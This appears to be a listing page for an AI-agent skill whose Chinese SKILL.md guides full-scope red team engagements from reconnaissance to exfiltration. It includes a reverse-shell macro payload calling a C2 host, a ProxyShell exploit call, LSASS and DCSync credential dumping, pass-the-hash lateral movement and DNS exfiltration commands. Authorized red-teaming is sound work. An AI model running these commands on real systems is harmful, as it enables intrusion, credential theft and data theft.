conducting-full-scope-red-team-engagement
规划并执行全范围红队演练,覆盖从侦察到后渗透的完整攻击链,使用符合 MITRE ATT&CK 的战术技术和程序(TTP),以评估组织的检测和响应能力。
Best use case
conducting-full-scope-red-team-engagement is best used when you need a repeatable AI agent workflow instead of a one-off prompt.
规划并执行全范围红队演练,覆盖从侦察到后渗透的完整攻击链,使用符合 MITRE ATT&CK 的战术技术和程序(TTP),以评估组织的检测和响应能力。
Teams using conducting-full-scope-red-team-engagement should expect a more consistent output, faster repeated execution, less prompt rewriting.
When to use this skill
- You want a reusable workflow that can be run more than once with consistent structure.
When not to use this skill
- You only need a quick one-off answer and do not need a reusable workflow.
- You cannot install or maintain the underlying files, dependencies, or repository context.
Installation
Claude Code / Cursor / Codex
Manual Installation
- Download SKILL.md from GitHub
- Place it in
.claude/skills/conducting-full-scope-red-team-engagement/SKILL.mdinside your project - Restart your AI agent — it will auto-discover the skill
How conducting-full-scope-red-team-engagement Compares
| Feature / Agent | conducting-full-scope-red-team-engagement | Standard Approach |
|---|---|---|
| Platform Support | Not specified | Limited / Varies |
| Context Awareness | High | Baseline |
| Installation Complexity | Unknown | N/A |
Frequently Asked Questions
What does this skill do?
规划并执行全范围红队演练,覆盖从侦察到后渗透的完整攻击链,使用符合 MITRE ATT&CK 的战术技术和程序(TTP),以评估组织的检测和响应能力。
Where can I find the source code?
You can find the source code on GitHub using the link provided at the top of the page.
SKILL.md Source
# 执行全范围红队演练
## 概述
全范围红队演练(Full-Scope Red Team Engagement)模拟真实世界的对手行为,覆盖网络杀伤链(Cyber Kill Chain)的所有阶段——从初始侦察到数据外泄——以评估组织的检测、预防和响应能力。与渗透测试(Penetration Testing)不同,红队行动优先注重隐蔽性、持久化和基于目标的场景,模拟高级持续性威胁(APT)。
## 前置条件
- 经高管领导签署的书面授权(交战规则文件)
- 明确的范围界定,包括在测试范围内/外的系统、升级联系人和紧急停止程序
- 相关对手组织的威胁情报(如 APT29、FIN7、Lazarus Group)
- 红队基础设施:C2 服务器、重定向器、钓鱼域名、载荷开发环境
- 确认符合《计算机欺诈和滥用法》(CFAA)及当地法律的法律审查
## 演练阶段
### 阶段一:规划与威胁建模
根据威胁配置文件,将演练映射到特定 MITRE ATT&CK 战术和技术:
| 杀伤链阶段 | MITRE ATT&CK 战术 | 示例技术 |
|---|---|---|
| 侦察(Reconnaissance) | TA0043 | T1593 搜索开放网站/域名, T1589 收集受害者身份信息 |
| 资源开发 | TA0042 | T1583.001 获取基础设施:域名, T1587.001 开发能力:恶意软件 |
| 初始访问 | TA0001 | T1566.001 鱼叉式钓鱼附件, T1078 有效账户 |
| 执行 | TA0002 | T1059.001 PowerShell, T1204.002 用户执行:恶意文件 |
| 持久化 | TA0003 | T1053.005 计划任务, T1547.001 注册表运行键 |
| 权限提升 | TA0004 | T1068 利用漏洞提权, T1548.002 UAC 绕过 |
| 防御规避 | TA0005 | T1055 进程注入, T1027 混淆文件 |
| 凭据访问 | TA0006 | T1003.001 LSASS 内存, T1558.003 Kerberoasting |
| 发现 | TA0007 | T1087 账户发现, T1018 远程系统发现 |
| 横向移动 | TA0008 | T1021.002 SMB/Windows 管理共享, T1550.002 哈希传递 |
| 收集 | TA0009 | T1560 归档收集数据, T1213 来自信息存储库的数据 |
| 数据外泄 | TA0010 | T1041 通过 C2 信道外泄, T1048 通过替代协议外泄 |
| 影响 | TA0040 | T1486 加密数据以影响业务, T1489 停止服务 |
### 阶段二:侦察(OSINT)
```bash
# 被动 DNS 枚举
amass enum -passive -d target.com -o amass_passive.txt
# 证书透明度日志搜索
python3 -c "
import requests
url = 'https://crt.sh/?q=%.target.com&output=json'
r = requests.get(url)
for cert in r.json():
print(cert['name_value'])
" | sort -u > subdomains.txt
# LinkedIn 员工枚举
theHarvester -d target.com -b linkedin -l 500 -f harvest_results
# 技术栈指纹识别
whatweb -v target.com --log-json=whatweb.json
# 泄露数据凭据搜索(已授权)
h8mail -t target.com -o h8mail_results.csv
```
### 阶段三:初始访问
红队演练常见的初始访问向量:
**鱼叉式钓鱼(T1566.001):**
```bash
# 生成带宏的载荷
msfvenom -p windows/x64/meterpreter/reverse_https LHOST=c2.redteam.local LPORT=443 -f vba -o macro.vba
# 配置 GoPhish 活动
# 配置 SMTP 配置文件、带借口的电子邮件模板和着陆页
gophish --config config.json
```
**外部服务利用(T1190):**
```bash
# 扫描易受攻击的服务
nmap -sV -sC --script vuln -p 80,443,8080,8443 target.com -oA vuln_scan
# 利用已知 CVE(示例:ProxyShell CVE-2021-34473)
python3 proxyshell_exploit.py -t mail.target.com -e attacker@target.com
```
### 阶段四:后渗透与横向移动
```powershell
# 态势感知(T1082, T1016)
whoami /all
systeminfo
ipconfig /all
net group "Domain Admins" /domain
nltest /dclist:target.com
# 从 LSASS 收集凭据(T1003.001)
# 使用 Havoc C2 内置模块
dotnet inline-execute SafetyKatz.exe sekurlsa::logonpasswords
# Kerberoasting(T1558.003)
Rubeus.exe kerberoast /outfile:kerberoast_hashes.txt
# 通过 WMI 横向移动(T1047)
wmiexec.py domain/user:password@target-dc -c "whoami"
# 通过 PsExec 横向移动(T1021.002)
psexec.py domain/admin:password@fileserver.target.com
```
### 阶段五:目标达成
定义并追求特定目标:
1. **域控制**:获得域管理员访问权限并 DCSync 凭据
2. **数据外泄**:定位并外泄关键数据(如 PII、财务记录)
3. **业务影响模拟**:展示勒索软件部署能力(不实际执行)
4. **物理访问**:门禁卡克隆、尾随跟踪、服务器室访问
```bash
# DCSync 攻击(T1003.006)
secretsdump.py domain/admin:password@dc01.target.com -just-dc-ntlm
# 通过 DNS 外泄数据(T1048.003)
dnscat2 --dns "domain=exfil.redteam.com" --secret=s3cr3t
```
### 阶段六:报告与汇报
报告应包含:
1. **高管摘要**:业务影响、风险评级、关键发现
2. **攻击叙述**:带截图和证据的活动时间线
3. **MITRE ATT&CK 映射**:使用技术的完整热力图
4. **发现事项**:每个发现的 CVSS 分数、证据和修复建议
5. **检测差距分析**:SOC 检测到的与遗漏的内容对比
6. **紫队(Purple Team)建议**:针对已识别差距的具体检测规则
## 指标与 KPI
| 指标 | 描述 |
|---|---|
| 平均检测时间(MTTD) | 从行动到 SOC 检测的平均时间 |
| 平均响应时间(MTTR) | 从检测到遏制的平均时间 |
| TTP 覆盖率 | 已执行技术中被检测到的百分比 |
| 目标达成率 | 已完成的预定目标百分比 |
| 驻留时间 | 红队维持访问而未被检测到的总时间 |
## 工具与框架
- **C2 框架**: Havoc, Cobalt Strike, Sliver, Mythic, Brute Ratel C4
- **侦察**: Amass, Recon-ng, theHarvester, SpiderFoot
- **利用**: Metasploit, Impacket, CrackMapExec, Rubeus
- **后渗透**: Mimikatz, SharpCollection, BOF.NET
- **报告**: PlexTrac, Ghostwriter, Serpico
## 参考资料
- MITRE ATT&CK 框架: https://attack.mitre.org/
- 红队指南: https://redteam.guide/
- PTES(渗透测试执行标准): http://www.pentest-standard.org/
- TIBER-EU 红队演练框架: https://www.ecb.europa.eu/paym/cyber-resilience/tiber-eu/
- CBEST 情报主导测试: https://www.bankofengland.co.uk/financial-stability/financial-sector-continuityRelated Skills
performing-threat-emulation-with-atomic-red-team
使用 atomic-operator Python 框架执行 Atomic Red Team 测试,进行 MITRE ATT&CK 技术验证。 从 YAML 原子测试加载测试定义、运行攻击模拟并验证检测覆盖率。适用于测试 SIEM 检测规则、 验证 EDR 覆盖率或开展紫队演练。
performing-red-team-with-covenant
使用 Covenant C2 框架开展红队(Red Team)操作,用于授权的对手模拟,包括监听器设置、Grunt 部署、任务执行和横向移动(Lateral Movement)追踪。
performing-red-team-phishing-with-gophish
使用 Python gophish 库自动化 GoPhish 钓鱼模拟活动。创建含追踪像素的邮件模板、 配置 SMTP 发送配置文件、从 CSV 构建目标组、发起活动,并分析结果, 包括打开率、点击率和凭据提交统计数据,用于安全意识评估。
performing-purple-team-exercise
执行紫队(Purple Team)演练,通过协调红队对抗模拟与蓝队检测验证, 使用 MITRE ATT&CK 映射的攻击场景、实时检测测试和协作差距修复。 适用于 SOC 团队需要验证检测能力、提升分析师技能并通过结构化攻防协作填补检测缺口时。
performing-oauth-scope-minimization-review
执行 OAuth 2.0 权限范围最小化审查,识别过度授权的第三方应用集成、 过多的 API 范围、未使用的令牌授权以及跨身份提供商和 SaaS 平台的 高风险 OAuth 同意模式。 适用于 OAuth 范围审计、API 权限审查、第三方应用风险评估或同意授权最小化的请求。
executing-red-team-exercise
执行全面的红队演练(Red Teaming),模拟真实世界对手针对组织的人员、流程和技术的攻击行动。红队以隐蔽性为主要目标,采用从初始侦察到目标完成的完整攻击生命周期,同时测试组织的检测和响应能力。与渗透测试不同,此技能聚焦于对手模拟而非漏洞识别。适用于红队演练、对手模拟、对手仿真或全范围攻击性安全评估等请求场景。
executing-red-team-engagement-planning
红队演练规划是在任何攻击测试开始之前,确定范围、目标、交战规则(ROE)、威胁模型选择和操作时间表的基础阶段。
conducting-wireless-network-penetration-test
执行授权的无线网络渗透测试,通过测试弱加密协议、强制门户绕过、邪恶双胞胎攻击、WPA2/WPA3 握手捕获、流氓接入点检测和客户端攻击,评估 WiFi 基础设施的安全性。
conducting-spearphishing-simulation-campaign
鱼叉式钓鱼(Spearphishing)模拟是红队用于获取初始访问权限的定向社会工程学攻击向量。与广泛的钓鱼活动不同,鱼叉式钓鱼使用 OSINT 情报精心制作高度个性化的消息,针对特定个人。
conducting-social-engineering-pretext-call
规划并执行授权的语音钓鱼(vishing)借口电话,以评估员工对社会工程学(Social Engineering)的易感性,并评估安全意识控制措施的有效性。
conducting-social-engineering-penetration-test
设计并执行社会工程学渗透测试,包括钓鱼、语音钓鱼、短信钓鱼和物理借口活动,以衡量人员安全韧性并识别培训差距。
conducting-post-incident-lessons-learned
主持结构化的事件后审查,以识别根本原因、记录有效和无效的措施,并提出可操作的改进建议以提升未来的事件响应能力。